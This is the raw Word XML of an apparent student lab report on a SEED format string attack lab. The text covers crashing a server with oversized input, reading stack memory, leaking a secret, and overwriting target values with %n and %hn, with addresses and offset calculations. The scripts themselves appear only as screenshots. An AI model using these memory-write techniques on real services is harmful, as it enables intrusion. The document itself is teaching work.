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364443183"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w:rsidR="00C4310E" w:rsidRDefault="00C4310E"/>
        <w:p w:rsidR="00C4310E" w:rsidRDefault="00C4310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10E" w:rsidRDefault="00FA722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310E" w:rsidRPr="00C4310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Format String Attack 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10E" w:rsidRDefault="00C431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EED 2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10E" w:rsidRDefault="00C4310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nter your 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C4310E" w:rsidRDefault="006B292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310E" w:rsidRPr="00C4310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Format String Attack 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310E" w:rsidRDefault="00C431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EED 2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4310E" w:rsidRDefault="00C4310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nter your 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310E" w:rsidRDefault="00C4310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4310E" w:rsidRDefault="00C4310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67527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310E" w:rsidRDefault="00C4310E">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="006B292B" w:rsidRDefault="00C4310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74983" w:history="1">
            <w:r w:rsidR="006B292B" w:rsidRPr="00955F20">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Environment Setup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83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 w:rsidR="00FA722A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2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2474984" w:history="1">
            <w:r w:rsidR="006B292B" w:rsidRPr="00955F20">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 1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84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2474985" w:history="1">
            <w:r w:rsidR="006B292B" w:rsidRPr="00955F20">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 2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85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2474986" w:history="1">
            <w:r w:rsidR="006B292B" w:rsidRPr="00955F20">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 2A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86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2474987" w:history="1">
            <w:r w:rsidR="006B292B" w:rsidRPr="00955F20">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 2B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87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2474988" w:history="1">
            <w:r w:rsidR="006B292B" w:rsidRPr="00955F20">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 3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88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2474989" w:history="1">
            <w:r w:rsidR="006B292B" w:rsidRPr="00955F20">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 3A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89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2474990" w:history="1">
            <w:r w:rsidR="006B292B" w:rsidRPr="00955F20">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 3B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90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2474991" w:history="1">
            <w:r w:rsidR="006B292B" w:rsidRPr="00955F20">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 3C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91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2474992" w:history="1">
            <w:r w:rsidR="006B292B" w:rsidRPr="00955F20">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 4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92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2474993" w:history="1">
            <w:r w:rsidR="006B292B" w:rsidRPr="00955F20">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 5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93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6B292B" w:rsidRDefault="00FA72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2474994" w:history="1">
            <w:r w:rsidR="006B292B" w:rsidRPr="00955F20">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 6</w:t>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc132474994 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006B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B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C4310E" w:rsidRDefault="00C4310E">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00C4310E" w:rsidRDefault="00C4310E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00367B30" w:rsidRDefault="00C4310E" w:rsidP="00C4310E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc132474983"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Environment Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00C4310E" w:rsidRDefault="00997F33" w:rsidP="00C4310E">
      <w:r w:rsidRPr="00997F33">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F1E26C3" wp14:editId="140A70E6">
            <wp:extent cx="5731510" cy="506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33" w:rsidRDefault="00997F33" w:rsidP="00C4310E">
      <w:r w:rsidRPr="00997F33">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E865D95" wp14:editId="1522254A">
            <wp:extent cx="5731510" cy="2446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33" w:rsidRDefault="00997F33" w:rsidP="00C4310E">
      <w:r w:rsidRPr="00997F33">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7341F0F2" wp14:editId="2B89C80B">
            <wp:extent cx="5731510" cy="2237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40" w:rsidRDefault="00844E40" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00844E40" w:rsidRDefault="00844E40" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00844E40" w:rsidRDefault="00844E40" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00844E40" w:rsidRDefault="00844E40" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00844E40" w:rsidRDefault="00844E40" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00844E40" w:rsidRDefault="00844E40" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00844E40" w:rsidRDefault="00844E40" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00844E40" w:rsidRDefault="00844E40" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00844E40" w:rsidRDefault="00844E40" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00844E40" w:rsidRPr="00844E40" w:rsidRDefault="00C4310E" w:rsidP="00844E40">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc132474984"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="00997F33" w:rsidRPr="00997F33" w:rsidRDefault="00997F33" w:rsidP="00997F33">
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="001C453E">
        <w:t>ending hello to server when it asks to send input.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C4310E" w:rsidRDefault="00997F33" w:rsidP="00C4310E">
      <w:r w:rsidRPr="00997F33">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32315590" wp14:editId="0452DA1D">
            <wp:extent cx="5731510" cy="36550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40" w:rsidRDefault="00844E40" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00844E40" w:rsidRDefault="00844E40" w:rsidP="00C4310E">
      <w:r>
        <w:t>Starting the serve</w:t>
      </w:r>
      <w:r w:rsidR="001C453E">
        <w:t>r where it asks for user input and as shown in the screenshot above the hello ping was sent to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00844E40" w:rsidRDefault="00844E40" w:rsidP="00C4310E">
      <w:r w:rsidRPr="00844E40">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2763BF31" wp14:editId="38AA885A">
            <wp:extent cx="5731510" cy="3688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3E" w:rsidRDefault="001C453E" w:rsidP="00C4310E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>I have changed the input as to put go beyond the 1500 bytes of data that can be accepted by the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C453E" w:rsidRDefault="001C453E" w:rsidP="00C4310E">
      <w:r w:rsidRPr="001C453E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50054779" wp14:editId="7460FD07">
            <wp:extent cx="5731510" cy="1087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3E" w:rsidRDefault="001C453E" w:rsidP="00C4310E">
      <w:r>
        <w:t>Now the program gets stuck and crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C453E" w:rsidRDefault="001C453E" w:rsidP="00C4310E">
      <w:r w:rsidRPr="001C453E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="221F662B" wp14:editId="77D884C3">
            <wp:extent cx="5731510" cy="37433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44" w:rsidRDefault="00BB4844" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00BB4844" w:rsidRDefault="00BB4844" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00BB4844" w:rsidRDefault="00BB4844" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00BB4844" w:rsidRDefault="00BB4844" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00BB4844" w:rsidRDefault="00BB4844" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00BB4844" w:rsidRDefault="00BB4844" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00BB4844" w:rsidRDefault="00BB4844" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00BB4844" w:rsidRDefault="00BB4844" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00BB4844" w:rsidRDefault="00BB4844" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00C4310E" w:rsidRDefault="00C4310E" w:rsidP="00C4310E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc132474985"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="005A63B5" w:rsidRPr="005A63B5" w:rsidRDefault="005A63B5" w:rsidP="005A63B5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc132474986"/>
      <w:r>
        <w:t>Task 2A</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="00BB4844" w:rsidRDefault="00BB4844" w:rsidP="00C4310E">
      <w:r>
        <w:t>Using the script to find the first 4 bytes of the buffer array</w:t>
      </w:r>
      <w:r w:rsidR="0087148D">
        <w:t xml:space="preserve"> on stack</w:t>
      </w:r>
      <w:r>
        <w:t>. Where a number has been added for easy identification.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB4844" w:rsidRDefault="00BB4844" w:rsidP="00C4310E">
      <w:r w:rsidRPr="00BB4844">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="362B7354" wp14:editId="51185341">
            <wp:extent cx="5731510" cy="183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83" w:rsidRDefault="00FC4383" w:rsidP="00C4310E">
      <w:r>
        <w:t>Sending the script to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC4383" w:rsidRDefault="00FC4383" w:rsidP="00C4310E">
      <w:r w:rsidRPr="00FC4383">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BC470E3" wp14:editId="04222281">
            <wp:extent cx="5731510" cy="5314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1B" w:rsidRDefault="003D171B" w:rsidP="00C4310E">
      <w:r>
        <w:t xml:space="preserve">It is evident from the screenshot below that the number has been identified as highlighted in the screenshot below and mentioned in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>number</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> variable in the screenshot above.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D171B" w:rsidRDefault="003D171B" w:rsidP="00C4310E">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D171B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="510F854D" wp14:editId="6695BAB8">
            <wp:extent cx="5731510" cy="36988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1B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009621AB" w:rsidRDefault="009621AB" w:rsidP="00C4310E">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009621AB" w:rsidRDefault="009621AB" w:rsidP="00C4310E">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009621AB" w:rsidRDefault="009621AB" w:rsidP="009621AB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc132474987"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 2B</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidR="009621AB" w:rsidRPr="003A4886" w:rsidRDefault="003A4886" w:rsidP="009621AB">
      <w:r>
        <w:t xml:space="preserve">Using this script to perform this task. Where secret address has been placed in variable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>number</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001C2008">
        <w:t xml:space="preserve"> Which will be changed to the address of the secret message.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A4886" w:rsidRDefault="003A4886" w:rsidP="009621AB">
      <w:r w:rsidRPr="003A4886">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DADD268" wp14:editId="5FDE8047">
            <wp:extent cx="5731510" cy="18084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83" w:rsidRDefault="00FC4383" w:rsidP="009621AB">
      <w:r>
        <w:t>Sending the script to server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC4383" w:rsidRDefault="00FC4383" w:rsidP="009621AB">
      <w:r w:rsidRPr="00FC4383">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="575B8D5F" wp14:editId="6B9C1FEA">
            <wp:extent cx="5731510" cy="9315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C0" w:rsidRDefault="007225C0" w:rsidP="009621AB">
      <w:r>
        <w:t>Now it is evident from the screenshot below that the secret message as mentioned in the script as secret message has been found and displayed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007225C0" w:rsidRPr="009621AB" w:rsidRDefault="007225C0" w:rsidP="009621AB">
      <w:r w:rsidRPr="007225C0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30755C0E" wp14:editId="64205347">
            <wp:extent cx="5731510" cy="25666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0E" w:rsidRDefault="00C4310E" w:rsidP="00C4310E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc132474988"/>
      <w:r>
        <w:t>Task 3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="00C4310E" w:rsidRDefault="00F62C6C" w:rsidP="00F62C6C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc132474989"/>
      <w:r>
        <w:t>Task 3A</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="00F62C6C" w:rsidRPr="001D55BB" w:rsidRDefault="001D55BB" w:rsidP="00F62C6C">
      <w:r>
        <w:t xml:space="preserve">Now to find the address of the target placed in variable named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>number</w:t>
      </w:r>
      <w:r>
        <w:t>. Simply in the script modified the address with %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> which modifies the value of corresponding parameter address by 4 bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D55BB" w:rsidRDefault="00202891" w:rsidP="00F62C6C">
      <w:r w:rsidRPr="00202891">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B772946" wp14:editId="7993161B">
            <wp:extent cx="5731510" cy="25685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BB" w:rsidRDefault="001D55BB" w:rsidP="00F62C6C">
      <w:r>
        <w:t>Sending the script to server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D55BB" w:rsidRDefault="00F36FE8" w:rsidP="00F62C6C">
      <w:r w:rsidRPr="00F36FE8">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23C8B007" wp14:editId="6CC9E8CD">
            <wp:extent cx="5731510" cy="6870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E8" w:rsidRDefault="00F36FE8" w:rsidP="00F62C6C">
      <w:r>
        <w:t>The string length has been visibly modified of the string that preceded to the string printout.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F36FE8" w:rsidRDefault="00F36FE8" w:rsidP="00F62C6C">
      <w:r w:rsidRPr="00F36FE8">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F507FD6" wp14:editId="251F9DA6">
            <wp:extent cx="5731510" cy="14135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04579" w:rsidRDefault="00204579" w:rsidP="00F62C6C"/>
    <w:p w:rsidR="00204579" w:rsidRDefault="00204579" w:rsidP="00F62C6C"/>
    <w:p w:rsidR="00204579" w:rsidRDefault="00204579" w:rsidP="00F62C6C"/>
    <w:p w:rsidR="00204579" w:rsidRDefault="00204579" w:rsidP="00F62C6C"/>
    <w:p w:rsidR="00204579" w:rsidRDefault="00204579" w:rsidP="00F62C6C"/>
    <w:p w:rsidR="00204579" w:rsidRDefault="00204579" w:rsidP="00F62C6C"/>
    <w:p w:rsidR="00204579" w:rsidRDefault="00204579" w:rsidP="00F62C6C"/>
    <w:p w:rsidR="00204579" w:rsidRDefault="00204579" w:rsidP="00F62C6C"/>
    <w:p w:rsidR="00204579" w:rsidRDefault="00204579" w:rsidP="00F62C6C"/>
    <w:p w:rsidR="00204579" w:rsidRDefault="00204579" w:rsidP="00F62C6C"/>
    <w:p w:rsidR="00F62C6C" w:rsidRDefault="00F62C6C" w:rsidP="00F62C6C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc132474990"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 3B</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="00F62C6C" w:rsidRPr="00204579" w:rsidRDefault="00204579" w:rsidP="00F62C6C">
      <w:r>
        <w:t>Modified the script so the address is also changed instead of just pointing to 0x5000 value. The script has been modified according to these calculations</w:t>
      </w:r>
      <w:r w:rsidRPr="00204579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204579">
        <w:t>0x5000=20480=4+62*325+326</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00204579" w:rsidRDefault="00204579" w:rsidP="00F62C6C">
      <w:r w:rsidRPr="00204579">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A6D5391" wp14:editId="62620791">
            <wp:extent cx="5731510" cy="24650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A1" w:rsidRDefault="00BD6AA1" w:rsidP="00F62C6C">
      <w:r>
        <w:t>Sending the script to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD6AA1" w:rsidRDefault="00BD6AA1" w:rsidP="00F62C6C">
      <w:r w:rsidRPr="00BD6AA1">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43A155D2" wp14:editId="2AE90E90">
            <wp:extent cx="5731510" cy="7124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A1" w:rsidRDefault="00BD6AA1" w:rsidP="00F62C6C">
      <w:r>
        <w:t>This is the response received.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD6AA1" w:rsidRDefault="00BD6AA1" w:rsidP="00F62C6C">
      <w:r w:rsidRPr="00BD6AA1">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="685AA7F4" wp14:editId="6E83B3C2">
            <wp:extent cx="5731510" cy="31457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A1" w:rsidRDefault="00BD6AA1" w:rsidP="00F62C6C"/>
    <w:p w:rsidR="00BD6AA1" w:rsidRDefault="00BD6AA1" w:rsidP="00F62C6C"/>
    <w:p w:rsidR="00BD6AA1" w:rsidRDefault="00BD6AA1" w:rsidP="00F62C6C"/>
    <w:p w:rsidR="00BD6AA1" w:rsidRDefault="00BD6AA1" w:rsidP="00F62C6C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>And at the bottom of it the desired value is mentioned as result.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD6AA1" w:rsidRDefault="00BD6AA1" w:rsidP="00F62C6C">
      <w:r w:rsidRPr="00BD6AA1">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7023A93E" wp14:editId="227F39AF">
            <wp:extent cx="5263116" cy="23260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350" cy="234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5F" w:rsidRDefault="00E81F5F" w:rsidP="00F62C6C"/>
    <w:p w:rsidR="00E81F5F" w:rsidRDefault="00E81F5F" w:rsidP="00E81F5F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc132474991"/>
      <w:r>
        <w:t>Task 3C</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="00DA3BD6" w:rsidRPr="00DA677C" w:rsidRDefault="00E81F5F" w:rsidP="00DA677C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I modified the script to fit the calculations </w:t>
      </w:r>
      <w:r w:rsidRPr="00E81F5F">
        <w:t>0xAABB=43707=12+693*62+729</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00E81F5F">
        <w:t>0xCCDD-0xAABB=8738</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Here, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E81F5F">
        <w:t>0x080e506a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the address of the highest byte while the 0x080e5068 is the lowest two-byte address. Explaining two-bite, even though the process is the same as above task but </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>hn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> was used to overwrite two bytes at a time. An overall of 12 characters which explains the use of %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>hn</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00E81F5F" w:rsidRDefault="00E81F5F" w:rsidP="00E81F5F">
      <w:r w:rsidRPr="00E81F5F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DEBF176" wp14:editId="7F7F4951">
            <wp:extent cx="5475767" cy="38899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2180" cy="38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D6" w:rsidRDefault="00DA3BD6" w:rsidP="00E81F5F"/>
    <w:p w:rsidR="00DA3BD6" w:rsidRDefault="00DA3BD6" w:rsidP="00E81F5F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sending the script to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA3BD6" w:rsidRDefault="00DA3BD6" w:rsidP="00E81F5F">
      <w:r w:rsidRPr="00DA3BD6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A0E15CA" wp14:editId="46D415BA">
            <wp:extent cx="5731510" cy="8312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D6" w:rsidRDefault="00DA3BD6" w:rsidP="00E81F5F">
      <w:r>
        <w:t>As the previous task when the script is received the server displays the target value which is the desired result.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA3BD6" w:rsidRDefault="00DA3BD6" w:rsidP="00E81F5F">
      <w:r w:rsidRPr="00DA3BD6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="375395BA" wp14:editId="38329D88">
            <wp:extent cx="5731510" cy="40214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3" w:rsidRDefault="00906793" w:rsidP="00E81F5F"/>
    <w:p w:rsidR="00906793" w:rsidRDefault="00906793" w:rsidP="00E81F5F"/>
    <w:p w:rsidR="00906793" w:rsidRDefault="00906793" w:rsidP="00E81F5F"/>
    <w:p w:rsidR="00906793" w:rsidRDefault="00906793" w:rsidP="00E81F5F"/>
    <w:p w:rsidR="00906793" w:rsidRDefault="00906793" w:rsidP="00E81F5F"/>
    <w:p w:rsidR="00906793" w:rsidRDefault="00906793" w:rsidP="00E81F5F"/>
    <w:p w:rsidR="00906793" w:rsidRDefault="00906793" w:rsidP="00E81F5F"/>
    <w:p w:rsidR="00906793" w:rsidRDefault="00906793" w:rsidP="00E81F5F"/>
    <w:p w:rsidR="00906793" w:rsidRPr="00E81F5F" w:rsidRDefault="00906793" w:rsidP="00E81F5F"/>
    <w:p w:rsidR="00C4310E" w:rsidRDefault="00C4310E" w:rsidP="00C4310E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
